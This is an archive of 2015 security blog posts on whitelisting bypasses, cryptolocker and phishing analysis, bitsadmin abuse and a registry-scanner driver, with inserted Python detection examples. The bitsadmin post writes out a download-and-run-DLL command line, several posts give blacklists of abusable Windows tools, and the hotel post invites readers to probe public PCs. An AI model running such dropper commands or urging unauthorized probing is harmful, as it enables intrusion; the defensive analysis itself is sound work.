2015's Blog Archive - A collection of all blog posts from the year 2015.

Archive 2015

Last modified 2017/04/17 by Flo

Here you will find my posts from 2015, tl;dr.

Limits of Application Whitelisting

2015/12/07 by Flo

If you are peeking through the scene you may have noticed that Application Whitelisting is currently under fire and security researchers have found quite impressive ways to overcome the classic whitelisting approach - be it policy based or hash based. Information Security Analyst Casey Smith and SEC Consult did a great job analyzing and bypassing whitelisting approaches in the last couple of months and weeks, so I heavily suggest that you check out their stuff.

In a nutshell, most solutions fail in several aspects: forgetting about interpreters and scripting languages, incomplete or bad user manuals that lead to wrong configurations, bad code quality that leads to exploits or bypasses of the whitelisting solution, whitelisted Windows paths that are writable by attackers, etc. Especially interpreters and scripting languages are a very interesting way to attack an application whitelisting protected machine and often succeed if one did not configure the whitelist tightly.

We as security guys and hackers know that nothing is absolutely bullet proof; IT security is always a battle of the fittest and often looks like playing cat and mouse. Thus your IT security mitigation and defense strategies should always be layered. You should always have different protection strategies in place to jump in where one dedicated solution may fail. Never stop rethinking your mitigation techniques, keep up to date and check out what the bad black and white hats are doing.

It hopefully was well known that classic whitelisting will fail when attackers can use (bytecode) interpreters or reflective in-memory attacks to start malicious code. To avoid such attacks you should do more than just check the executable intended to run. For example you can check who is calling what - I call this parent checking and implemented it into Tuersteher as well. So you can blacklist the browser such that it cannot start a cmd.exe shell or any scripting host. I have also implemented several kernel drivers that are able to check the command line options an executable is going to be started with (see the command line scanner at Excubits). For example my driver can detect that the browser wants to start cmd.exe with the /c flag, or that powershell.exe was called with a script from C:\Users\Florian\AppData\Local\Temp\. So you can whitelist powershell just for some well known (and really needed) command line parameters, and only with script files from sources you know and trust. An attacker is then not able to start these security critical executables with command line options pointing to malicious options and references (like malign scripts). I also use a memory protection driver that controls which process has access to the memory of another process. This helps to reduce the attack surface for exploits and other malicious executables that try to inject their code into another legitimately running application like explorer.exe, svchost.exe, etc.

Well, I know, this will not block all attacks; it is a way to mitigate and makes a successful attack more complicated. There are still gaps like exploits that directly (reflectively) load their malware (DLL) into the exploited application's own process. Personally I think that we will encounter more and more in-memory attacks in the near future as anti-exploit techniques and protection tools will be armed against the malign stuff we currently see.

I just do not want to blame whitelisting, because I still think it is a great way to mitigate a whole bunch of basic attacks. If you are into malware analysis you will confirm that most (~80-90%) of the attacks we see could be blocked by even simple application whitelisting, so you shall implement it. But you should also know the limits and see it as one mitigation out of a bunch of mitigations you need. It is not enough to install application whitelisting and be done! There is more to do and more to review on a regular basis. IT security is a moving process; it will never be enough to just install that super cool anti-malware and anti-exploit application, you should always keep track of what is going on in the scene and adapt to new developments.

For a quick start, enhance your current whitelisting configuration following these recommendations:

  • Blacklist all occurrences of powershell.exe if you do not use it regularly,
  • Blacklist or remove all interpreters (e.g. python, perl, ...) if you do not use them,
  • Blacklist or remove all debuggers,
  • Only whitelist required software, move not used software to the blacklist, and
  • If there is software you only use once a year put it onto the blacklist and then temporarily put it on the whitelist if you really need it for the dedicated task.

Also blacklist the following applications (executables) if you do not need them:

  • *InstallUtil*
  • *Regsvcs*
  • *RegAsm*
  • *wusa*
  • ?:\$Recycle*
  • *reg.exe
  • *vssadmin.exe
  • *aspnet_compiler.exe
  • *csc.exe
  • *jsc.exe
  • *vbc.exe
  • *ilasm.exe
  • *MSBuild.exe
  • *script.exe
  • *journal.exe
  • *msiexec.exe
  • *bitsadmin*
  • *iexpress.exe
  • *mshta.exe
  • *systemreset.exe
  • *bcdedit.exe
  • *mstsc.exe
  • *powershell.exe
  • *powershell_ise.exe
  • *hh.exe
  • *set.exe
  • *setx.exe
  • *InstallUtil.exe
  • *IEExec.exe
  • *DFsvc.exe
  • *dfshim.dll
  • *PresentationHost.exe
  • C:\Windows\ADFS\*
  • C:\Windows\Fonts\*
  • C:\Windows\Minidump\*
  • C:\Windows\Offline Web Pages\*
  • C:\Windows\tracing\*
  • C:\Windows\Tasks\*
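The parent checking and command line checks described above, together with the wildcard blacklist (the same check applies to the bitsadmin post further down), as an added example that is not code from this post, Tuersteher or Excubits: a small policy evaluator in Python that applies blacklist patterns in the post's own wildcard syntax, parent/child rules, and per-executable flag and script-directory rules to constructed process-creation events. The rule format, the event fields and the sample paths are this example's assumptions.

```python
import fnmatch
import ntpath
from dataclasses import dataclass

# Constructed process-creation event: what a parent-checking / command-line
# scanning driver hands to its policy engine. Field names are assumptions.
@dataclass(frozen=True)
class ProcEvent:
    parent: str   # image path of the process doing the create call
    image: str    # image path of the process about to start
    argv: tuple   # argv[0] is the image name, the rest are its arguments

@dataclass(frozen=True)
class Policy:
    # Patterns in the post's wildcard syntax ("*", "?"), case-insensitive,
    # matched against the full image path.
    blacklist: tuple
    # (parent pattern, child pattern): the parent may never start the child.
    parent_rules: tuple
    # (image pattern, allowed flags, trusted script dirs, script extensions):
    # any other flag, or a script outside the trusted dirs, is blocked.
    cmdline_rules: tuple

def matches(pattern, path):
    return fnmatch.fnmatchcase(path.lower(), pattern.lower())

def under_trusted_dir(path, trusted_dirs):
    norm = ntpath.normcase(ntpath.normpath(path))
    return any(norm.startswith(ntpath.normcase(d).rstrip("\\") + "\\")
               for d in trusted_dirs)

def evaluate(event, policy):
    """Return (allowed, reason); the first matching rule decides."""
    name = ntpath.basename(event.image)
    for pat in policy.blacklist:
        if matches(pat, event.image):
            return False, f"{name}: image matches blacklist entry {pat}"
    for parent_pat, child_pat in policy.parent_rules:
        if matches(parent_pat, event.parent) and matches(child_pat, event.image):
            return False, f"{name}: parent {ntpath.basename(event.parent)} may not start it"
    for image_pat, flags, trusted_dirs, script_exts in policy.cmdline_rules:
        if not matches(image_pat, event.image):
            continue
        for arg in event.argv[1:]:
            if arg[:1] in ("-", "/"):
                if arg.lower() not in flags:
                    return False, f"{name}: flag {arg} is not whitelisted"
            elif arg.lower().endswith(script_exts) and not under_trusted_dir(arg, trusted_dirs):
                return False, f"{name}: script {arg} is outside the trusted directories"
    return True, f"{name}: allowed"

# Sample policy built from the post's recommendations (paths are constructed).
POLICY = Policy(
    blacklist=("*InstallUtil*", "*mshta.exe", "*bitsadmin*", "*MSBuild.exe",
               r"?:\$Recycle*"),
    parent_rules=((r"*\chrome.exe", r"*\cmd.exe"),
                  (r"*\chrome.exe", "*script.exe"),
                  (r"*\winword.exe", r"*\powershell.exe")),
    # powershell: only -NoProfile/-File, and only scripts from C:\Scripts
    cmdline_rules=((r"*\powershell.exe", ("-noprofile", "-file"),
                    (r"C:\Scripts",), (".ps1",)),),
)

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
EVENTS = (
    ProcEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r"C:\Windows\System32\cmd.exe", ("cmd.exe", "/c", "dir")),
    ProcEvent(EXPLORER, PS, ("powershell.exe", "-NoProfile", "-File",
                             r"C:\Users\Florian\AppData\Local\Temp\update.ps1")),
    ProcEvent(EXPLORER, PS, ("powershell.exe", "-NoProfile", "-File",
                             r"C:\Scripts\backup.ps1")),
    ProcEvent(EXPLORER, PS, ("powershell.exe", "-ExecutionPolicy", "Bypass",
                             "-File", r"C:\Scripts\backup.ps1")),
    ProcEvent(EXPLORER, r"C:\Windows\System32\mshta.exe", ("mshta.exe", "x.hta")),
    ProcEvent(EXPLORER, r"C:\$Recycle.Bin\S-1-5-21-1\setup.exe", ("setup.exe",)),
)

def run_demo(policy=POLICY, events=EVENTS):
    return [evaluate(e, policy) for e in events]

if __name__ == "__main__":
    for allowed, reason in run_demo():
        print("ALLOW" if allowed else "BLOCK", reason)
```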

I also suggest that you restrict write access permissions on

  • C:\Windows\ADFS\*
  • C:\Windows\Fonts\*
  • C:\Windows\Minidump\*
  • C:\Windows\Offline Web Pages\*
  • C:\Windows\tracing\*
  • C:\Windows\Temp\*
  • C:\Windows\Tasks\*
  • C:\ProgramData\*

such that you - as a default/normal user - cannot copy (or write) files into one of these folders. Please note: ensure that Windows Update (or the Trusted Installer and Admin) are still able to write into these folders, or you are going to end up in some trouble.

If you have any questions or want to discuss, well, I am open minded and happy to hear from you.

A story about Hotel Business Center PCs

2015/10/30 by Flo

Having had a lot of business trips in the last couple of months I also spent some time in hotel lobbies, waiting for colleagues, to check in and out, waiting for the transfer bus or taxi etc. In modern hotels you can enjoy fast WiFi, but most hotels also feature guest PCs or a business center where you can use PCs to surf the web, write letters with Word, print PDFs, do some copying etc.

Anyway, being and waiting in hotels is boring, so I started to check out these hotel lobby and business center PCs I had often encountered but always ignored - until now! So, what happened? Well, I lurked around and watched people to see how they use such computers. To my amazement there were a lot of people doing private things on such machines, like opening their web-mail accounts, Facebook, Twitter, Amazon and online banking, etc. Some opened up their car rental vouchers and flight tickets for printing or rebooking etc. So there is a lot of personal information processed on such machines, and a lot of user names and passwords used.

Thus I started to do some basic security checks on these PCs, checking the browser's cache, auto-fill features, etc. It turned out that these PCs are all running Microsoft Windows (7 or 8.1), Chrome, WinZIP, Adobe Acrobat Reader and Microsoft Office. Most of them are not patched against the latest vulnerabilities (I tried ~30 at 10 different hotels across Europe in Germany, Spain, Corsica, Poland and Great Britain). All machines had an anti virus in place. There was no additional protection against starting applications or dynamic link libraries. Some had decent SRPs installed, but I always managed to inject executables through sticky shell commands or file open dialogs, etc. Amazingly most systems were protected by some kind of file system virtualization, so after a reboot any unintended software installation or manipulation of the file system was gone. Nice to know, but these systems were only rebooted manually by the hotel staff once a day (around midnight). So if some hotel guest got hit by a drive-by (or if he or she installed malware) early in the morning, the malware could have spied on all subsequent users during the rest of the day.

Well, we security enthusiasts all know that you shall never ever use such machines. But I was kind of hoping that these hotels (and some of them have big names in the scene) are a bit more aware and would try to protect their hotel lobby or business center PCs better than this. Not just to protect their guests, but also because these machines have access to the hotel's network in some fashion. I could think of further attacks starting by attacking such a PC and then going hanky-panky until you reach the hotel's core IT system (where you have access to debit and credit card information about guests, etc.). I would have expected that these machines are at least protected by very strict SRPs and that the user is not able to install (start) any application. Especially the latter is very dangerous because it means that an attacker is able to run his own executable code on such machines, which gives him more power and possibilities!

Well, I did not have the time to do more research on these PCs, but I think this could be very interesting and worth keeping an eye on. Just to make one thing clear: I did not install any malware nor anything bad, I just tried to find ways to start applications and libraries - I highly recommend that you do not try this either, because it is illegal! Anyway, this could be a very interesting research project, so next time you are waiting and hanging around in your hotel's lobby, give it a try. Send me an e-mail about your experiences, I am happy to hear about your findings and ideas.

FBI's strange advice on crypto lockers

2015/10/29 by Flo

At Boston's Cyber Security Summit the FBI noted that current crypto locker malware is that good that there is little you can do against it to recover your encrypted files. They said, "to be honest, we often advise people just to pay the ransom". More details can be read at Well, what to say? It sounds like capitulation and demonstrates the impotence against the cyber crime underground. If you are in the IT security business this is - of course - no breaking news. Organized crime is very good at adapting to new fields for its income and is getting very professional. It is not like back in the 1990s where just some teenage guys hacked for fun; nowadays we see highly sophisticated malware written by experts that want to make big money. So no more hacking for fun, it's hacking for profit and organized crime is already here. I have heard of organized crime gangs that now make more money with cybercrime than with drugs and in the red light district - that should make us think.

Lock Me Down Scotty - A quick analysis of a batch based Cryptolocker

2015/07/23 by Flo

Cryptolockers are no big news these days as they are very common and discussed on security blogs, at conferences and by law enforcement. Well, we were able to catch a new family that is currently not very common in the "scene", so this is why I feature a blog post on a very special cryptolocker that I have observed and analyzed during the last few days.

[Screenshot: cryptolocker splash screen]

In short, this piece of malware is not written in C, nor is it a PowerShell script or VBS. It was crafted very simply and tightly as a well crafted collection of open source and Windows' built-in console tools, wickedly combined in a more or less simple command line batch script. So what your malware scanner sees is a bunch of well known command line applications and simple (but obfuscated) batch scripts. In general not very suspicious if you have a quick look at them.

The cryptolocker itself was served as a single exe file that turned out to be a SFX (self-extracting executable) WinRAR archive. We caught the file claiming to be some Hollywood blockbuster movie streaming file with the extension ".Streaming.mpg.exe". The SFX was compiled with the latest version of WinRAR (US version) and used a custom, but well designed icon file, for curiosity reasons I assume. The SFX silently extracts the archive into the %temp% folder and starts up a batch script afterwards. The stage 1 batch script starts a primitive .vbs file that runs another batch script in a hidden cmd.exe console. I assume that these steps are performed just to avoid getting discovered by the ordinary user. The script also pauses several times and performs some bogus operations on the hidden cmd.exe shell to trick heuristic scanners, and to fool analysis environments that do not spend too much time on given samples. It also calls Sysinternals' sdelete to clean up the free space of the user's folders just to spend some more time doing nothing suspicious at the beginning. The tool sdelete will become a "key feature" later, so keep it in mind.

At the end you will be prompted with a fake error message claiming that a required "streaming codec" is missing. Thus, no FREE "Hollywood blockbuster" streamed. Well, as I often recommend to friends and customers: keep your ass away from these sharing sites. License music, pay for watching movies, and buy original software. Anyway, let's move on.

If you see this message it is almost too late. The stage 2 batch script has already called openssl to generate a 2048-bit RSA .x509 certificate. The certificate's subject is interesting:


After generating the certificate the batch script opens up TOR and submits the private key to a hidden service in the TOR network (.onion addresses are hard coded into the batch file) by using wget to post the data as a base64 data stream. Again, encoding was done entirely using openssl. Establishing a connection to the TOR network usually takes some time, so this seems to be a clever idea to bump out heuristic and analysis tools that will not wait for too long. By the way, the user agent specified for wget can be used to easily identify this kind of threat, because of its odd version of Google Chrome (42.0.1337.007):

Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.1337.007 Safari/537.36

If the hidden service has received the private key it returns a strange reply message "lockMeDownScotty" telling the batch script to continue and to encrypt all personal files (amongst others .jpg, .doc, .xls, .pdf, .txt, .mp3, .raw, ...) on the user's hard disk, especially in the user's profile folders. Encrypted files get the very fitting extension .cryptoLocked; together with "lockMeDownScotty", the user agent and the .x509 certificate it seems that these guys should also think about a career as clowns ☺.

To encrypt the files, the cryptolocker simply uses openssl and securely deletes the original unencrypted files using Sysinternals' sdelete. The secret key and other temp files created by the cryptolocker are all securely deleted using sdelete, so there is little chance to recover any of these afterwards. I tried on my forensics machines but never got a hit. The malware also tries to delete system backups and well known backup files (e.g. .bak, .old, .img, etc.). If you are not running your system with admin rights all the time, there is a good chance that the attempt to delete the system backups will fail and you are able to recover.

The cryptolocker also tries to become persistent in the registry (using reg.exe) to ensure it is executed every time the user boots up and logs in (the typical HKCU\Software\Microsoft\Windows\CurrentVersion\Run\). Although everything is performed in a pure batch file, the malware is clever enough to only generate a single 2048-bit key per user. It also contains a loop that tries to encrypt newly written files every 30 minutes. After each round of encryption the user gets prompted with a typical ransom message provided in the form of a simple jpg file (see screenshot above) started with the default image viewer and a text (.txt) file opened with Notepad. Nothing special here, it is presented in the same fashion as we all know from other ransom- and cryptolockers. What you see are the well known instructions on what to do and how much to pay. One remarkable thing is that if you pay using bitcoins you only have to pay 0.5 bitcoins, whereas if you decide to pay "cash" using gift cards it is considerably more: $500.

It is also very interesting that the crooks use TOR to its full extent. Not only do they upload the private key using TOR, they also only provide a link to an .onion address to get in touch with them. Most ransomware I have seen so far at least provides an ordinary web link that can be accessed without using TOR and that is hosted by one of the well known bullet-proof hosters or a #pwned server or site.

It seems that their hidden service is not available all the time; I have tried it several times and it was online only a few hours a day. I suppose that it is operated from a private online connection or it moves from one infected machine to another. Currently we are also not sure if this was and is some kind of test balloon and the crooks are preparing a larger attack. The hash of the initial executable is unknown to recent online malware analysis systems. We keep on track and will follow up if there is any news.

Instead of WinRAR, I assume other packers can be and are used, so you should watch out for packed executables containing at least these files:

  • openssl.exe
  • polipo.exe
  • sdelete.exe
  • tor.exe
  • wget.exe
  • libeay32.dll
  • libevent-2-0-5.dll
  • libevent_core-2-0-5.dll
  • libevent_extra-2-0-5.dll
  • libgcc_s_sjlj-1.dll
  • libgnurx-0.dll
  • libssp-0.dll
  • zlib1.dll

with some additional .cmd/.bat files and two or three tiny (2-4 lines of code) .vbs scripts. Since the SFX's hash value can be changed easily it does not make sense to provide it here. We also assume that the scripts may change, so what you shall look for is the combination of the executables listed above and some scripts in the same package.
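The triage rule just described (the tool combination plus driving scripts, the hard coded .onion addresses and the odd Chrome user agent), as an added Python example that is not code from the post: it walks an extracted package, checks for the listed tool set, and inspects any .cmd/.bat/.vbs scripts for the indicators. The scoring thresholds, the verdict strings and the constructed sample package (empty tool stubs and harmless placeholder scripts) are this example's assumptions.

```python
import os
import re
import tempfile

# Tool combination the post tells you to watch out for inside a packed dropper
# (the list is taken from the post; the scoring rules below are this example's own).
TOOLSET = frozenset({
    "openssl.exe", "polipo.exe", "sdelete.exe", "tor.exe", "wget.exe",
    "libeay32.dll", "libevent-2-0-5.dll", "libevent_core-2-0-5.dll",
    "libevent_extra-2-0-5.dll", "libgcc_s_sjlj-1.dll", "libgnurx-0.dll",
    "libssp-0.dll", "zlib1.dll",
})
SCRIPT_EXTS = (".cmd", ".bat", ".vbs")
ONION_RE = re.compile(r"\b[a-z2-7]{16}\.onion\b", re.IGNORECASE)
ODD_CHROME_UA = "Chrome/42.0.1337.007"   # the bogus version noted in the post

def triage_package(root):
    """Walk an extracted archive and return the indicators found in it."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            files[name.lower()] = os.path.join(dirpath, name)
    present = TOOLSET & set(files)
    result = {"tools_present": len(present), "tools_expected": len(TOOLSET),
              "scripts": 0, "tiny_vbs": 0, "onion_refs": 0, "odd_ua": False}
    for name, path in files.items():
        if not name.endswith(SCRIPT_EXTS):
            continue
        result["scripts"] += 1
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        result["onion_refs"] += len(ONION_RE.findall(text))
        result["odd_ua"] = result["odd_ua"] or ODD_CHROME_UA in text
        # the post describes the .vbs helpers as 2-4 lines of code
        if name.endswith(".vbs") and len(text.strip().splitlines()) <= 4:
            result["tiny_vbs"] += 1
    # Verdict: the complete tool combination plus scripts driving it is what
    # the post says to look for; TOR or user-agent hits make it near-certain.
    complete = result["tools_present"] == result["tools_expected"]
    if complete and result["scripts"] and (result["onion_refs"] or result["odd_ua"]):
        result["verdict"] = "batch cryptolocker package"
    elif complete and result["scripts"]:
        result["verdict"] = "suspicious tool bundle"
    else:
        result["verdict"] = "no match"
    return result

def build_sample_package(complete=True):
    """Create a constructed look-alike package: empty tool stubs, harmless scripts."""
    root = tempfile.mkdtemp(prefix="sfx_")
    for name in sorted(TOOLSET):
        if not complete and name == "tor.exe":
            continue
        open(os.path.join(root, name), "wb").close()
    with open(os.path.join(root, "stage2.cmd"), "w", encoding="utf-8") as fh:
        fh.write("@echo off\n"
                 "rem constructed placeholder standing in for the obfuscated stage 2 script\n"
                 "set SERVICE=abcdefghijklmnop.onion\n"
                 'set UA="Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 '
                 '(KHTML, like Gecko) Chrome/42.0.1337.007 Safari/537.36"\n')
    with open(os.path.join(root, "run.vbs"), "w", encoding="utf-8") as fh:
        fh.write("' constructed two-line placeholder\nWScript.Echo \"stub\"\n")
    return root

if __name__ == "__main__":
    print(triage_package(build_sample_package()))
```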

Well, since you have to start an initial executable, we think the most obvious action to avoid this threat is: do not start unknown executables, avoid getting tricked by e-mail attachments claiming to be an invoice PDF, tracking code, legal warning etc. Again, do not try to get things for free that normally cost money. From the Exploitbutser framework we have observed that most executables submitted are serial number generators, cracking tools, and alleged full versions of commercial software. So do not wonder if you get hit when you download and execute the illegal stuff mentioned above.

Personally I think that this is not the end of the story and we will see more malware in the same fashion coming up soon. Using command line tools in combination with simple scripting is not new, but in this special case it is somehow a clever idea to get evil things done without implementing stuff from scratch. I think that not so skilled "would be" hackers seem to be able to build quite potent malware without in-depth knowledge and coding skills. For example, securing communication, using (hidden) servers in the TOR network and using openssl as a strong crypto library looks like some of them are going this way. Even if such crooks do not understand what they do, building their malware upon such tools and libraries makes this scrap more resistant and secure - unfortunately.

But well, let us wait and see if this was just a mayfly.

As always, if you have any questions, comments or suggestions, do not hesitate and contact me.

DHL-Tracking Malware Spam

2015/06/08 by Flo

My spam honeypots got some new DHL tracking spam. DHL is a German national and international parcel shipping service. They also offer professional and global express services as well as customized logistics solutions. Shipments can be tracked through their web page. DHL never sends PDFs containing information about a shipment like in the screenshot on the right hand side. If you would like to see your shipment's state, go to DHL's official site and enter the shipment ID and other information like the ZIP code etc.

During the last couple of months cyber crooks used faked DHL tracking PDFs containing a link to the current tracking state of a shipment which allegedly was on the way. Inexperienced users may follow these links and thus download a ZIP file that contains a file in the format DHL_Sendungsverfolgung_2015.pdf.exe. It is yet another trojan that will be installed if a user gets fooled and clicks on the "pdf" that is just an evil exe.

Well, this is nothing new. We see lots of faked invoice and tracking attachments that persuade a user to click on a link, open a ZIP file etc. So what is the deal? Well, the "deal" is that most of the attached executables are truly unknown to all recently updated AVs you might have installed. Even if you are a user that keeps the system and protection software updated you are still in danger. One wrong or too fast click and your system is owned by malware. During the last few weeks we tested the detection rate: it took most AVs up to 24 hours until they were able to detect a single fake pdf.exe that was distributed through a PDF or e-mail link. Well, 24 hours is a long time - enough time to infect hundreds of PCs.

But there is more to say. Cyber criminals are getting smarter. If you are an informed user and check the linked domain manually, you get forwarded to the official site. Only the full URL will download the trojan ZIP. If you dig deeper there is more to see. The example PDF from above links to: hxxp://

If you do a whois on you see:

Well, these smart little crooks are getting tricky. So you better look twice, and by the way: do not trust your AV on new files that seem to be clean. Put them into quarantine for at least 24 hours until you open them ;-)

There are still some people around me constantly asking: Why shall we use anti-exe or application whitelisting? And why do we not use Windows' built-in anti-exe features?! Well, this blog post should give you a hint why you MUST use anti-exe these days. And why you cannot use the built-in technology? Well, there is nothing you can instantly use right out of the box without hassle.

Research on bitsadmin.exe: Microsoft’s built in Malware Dropper?

2015/05/21 by Flo

At this year's RSA Conference, Marcus Murray showed how hackers can gain access to a Windows server through a combination of weak upload sanity checks and missing execution prevention on the server. In his detailed presentation he showed how to create a cmd shell on a server that pipes I/O to the hacker's browser (a.k.a. browser shell). The next problem to solve was to upload and execute code using this cmd shell (what he needed was a malware dropper).

He managed to compile C# code (featuring a simple EXE dropper) through the cmd shell and was able to execute this executable. It then downloaded and executed a Metasploit generated sort of trojan executable from the web. In the end he fully controlled the Windows server and was able to dig deep into the network. It was a really cool showcase of the different techniques hackers combine to attack targets nowadays.

I really liked Murray's idea of building an on-the-fly dropper using C# code, then building an executable out of it and starting this executable on the attacked site to download the intended malware. Until now I thought this is one of the smartest ways to get foreign executables downloaded and started if you do not want to use an in-memory exploit using all the well known dropping and executing stuff in the win32 API. Well, I was wrong.

While analyzing some malware I stumbled over a really clever way to achieve the same thing Murray was doing, but with fewer steps to perform. Microsoft ships a tool called bitsadmin.exe. With this tool you can download arbitrary files from the Internet. Thus you can also download an executable and then execute it. Well, you could do something like

cmd.exe /c bitsadmin /transfer transaction /download /priority HIGH hxxp://xx.xx.xx.xx/Injected.dll %temp%\a.dll >NUL & rundll32 %temp%\a.dll,0

This simple line downloads a DLL and starts it with rundll32.exe. Instead of a DLL you could also use an EXE, but I prefer DLLs because they are most likely not blocked by many execution prevention systems on the market in their default configuration. So there is a good chance to pass by without getting into trouble.

Besides the fact that you are able to directly download any file you like, this also has an enormous impact for zero days. Analyzing many of them I often see sophisticated exploit code trying to obtain the library call addresses of URLDownloadToFile, WSARecv, recv, recvfrom, InternetReadFileExA, CreateProcess, ShellExecute, LoadLibrary, CreateFile, etc. just to download and run an executable. Well, using this technique attackers will save a damn bunch of such API calls. All they need to do is to call ShellExecute with the line above. This is awesomely smart.

To finish this blog post: guys beware, this is not a PoC or just a nice idea. I have seen it in the wild, it is already used by attackers. So beware and watch out for bitsadmin.exe. I would highly recommend deleting or blacklisting this executable on your servers (SOHO Windows, too) if you do not make use of it. By the way, you should additionally blacklist *script.exe, *vbc.exe, *jsc.exe, *ilasm.exe, *csc.exe, *build*, *powershell.exe, *hh.exe, *msiexec.exe. Well, I know sometimes you need one of these executables, but to be honest: in most scenarios you do not. And for everyday Word and Excel business you again do not need these executables. Protect your system, use black-/whitelisting or SRPs. For more details on what level of protection you achieve, see four simple strategies to mitigate 85% of threats.

If you have any questions do not hesitate to contact me. If you have more dangerous executables to block, or other smart ideas to build a dropper without using win32 APIs, let me know. I am always happy to hear from you and appreciate any feedback. Take care!

A kernel based Registry Scanner

2015/04/04 by Flo

It has been a little while since I have posted on forensics drivers. Well, I will now make up for it and have decided to publish my true kernel based registry scanner. It is yet another filter driver that can help you analyze malware and its behaviour. The driver fully runs in kernel mode and does not require any tool in user mode to work. Back in the days I did registry logging using SSDT and other hooking mechanisms. It worked very well, but it was far away from being a sound and gentle solution. With the RegistryScanner driver things are more streamlined, and due to the fact that everything is in the kernel now, it is more difficult for an attacker to bypass it.

The driver logs access attempts (query, create, rename, delete, replace) to a log file (c:\windows\registryscanner.log). You can simply install the driver through the RegistryScanner.inf. Start it from the console via "net start RegistryScanner" and stop it via "net stop RegistryScanner".

Please note: you shall sign the driver in order to load it into the kernel, for both architectures, meaning 32-bit and 64-bit. But you can also disable signature checking on boot up. Just start Windows with the enhanced boot options and select the appropriate boot option.

With RegistryScanner you can monitor access to the registry on forensics machines. The driver also logs newly created processes, so you can easily link the process id to the registry event that occurred. All events are logged to a text file in Unicode format. The delimiter character is #, so it should be no problem to process a given log with one of the well known scripting languages (e.g. Python or Ruby). By using a well defined rule set, you can filter out suspicious actions and thus quickly rate given files as probably suspicious. For example you could set up a VM and start up suspicious executables, then use RegistryScanner's log to check typical autostart locations in the registry etc. You can do the same with well known document formats (Word, Excel, PowerPoint, PDF, ...). If you open up a suspicious file and RegistryScanner's log file states that a well known autostart location (e.g. Run, DllAttach, Debugger, Service) was altered, it is very likely that your forensics machine was hit by an exploit trying to become persistent. Depending on the rules you have specified, you can quickly rate a given analysis stage without doing deep reverse engineering.

An example log is given here. I started up regedit.exe, created some keys, renamed and edited them. The first value indicates the process id (PID). On process creation the second value indicates the parent's process id.

8E0 # 954 # \??\C:\Windows\regedit.exe # "C:\Windows\regedit.exe"
8E0 # RegNtPostOpenKeyEx # \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
8E0 # RegNtKeyHandleClose # \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Neuer Wert #1
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Neuer Wert #1
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EvilExploit
8E0 # RegNtPreSetValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ EvilExploit # REG_SZ # 0000
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ EvilExploit
8E0 # RegNtPreSetValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ EvilExploit # REG_SZ # 43003A005C00550073006500720073005C006A006F00650044006F0065005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C006D006D006100700055007000640061007400650072002E006500780065000000
8E0 # RegNtPreSetValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bang # REG_DWORD_REG_DWORD_LITTLE_ENDIAN # 00000000
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Neuer Wert #1
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bitnuts
8E0 # RegNtPreSetValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bitnuts # REG_SZ # 0000
8E0 # RegNtPostOpenKeyEx # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Neuer Schlüssel #1
8E0 # RegNtRenameKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Neuer Schlüssel #1 -> Farid
8E0 # RegNtKeyHandleClose # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Farid
8E0 # RegNtPostOpenKeyEx # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Farid
8E0 # RegNtPreDeleteKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Farid
8E0 # exiting
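The rule based log processing described above, as an added Python example that is not part of the post or the RegistryScanner package: it parses the post's own log lines (reproduced as sample input), links each registry event to the image of the PID that caused it, decodes the hex encoded REG_SZ/REG_DWORD data, and reports write events on autostart locations. The delimiter must be treated as the padded " # ", because key names like "Neuer Wert #1" contain a bare "#". The autostart marker list and the set of write notifications are this example's assumptions.

```python
# Lines from the post's own RegistryScanner log, used as sample input.
SAMPLE_LOG = r"""
8E0 # 954 # \??\C:\Windows\regedit.exe # "C:\Windows\regedit.exe"
8E0 # RegNtPostOpenKeyEx # \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
8E0 # RegNtKeyHandleClose # \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Neuer Wert #1
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EvilExploit
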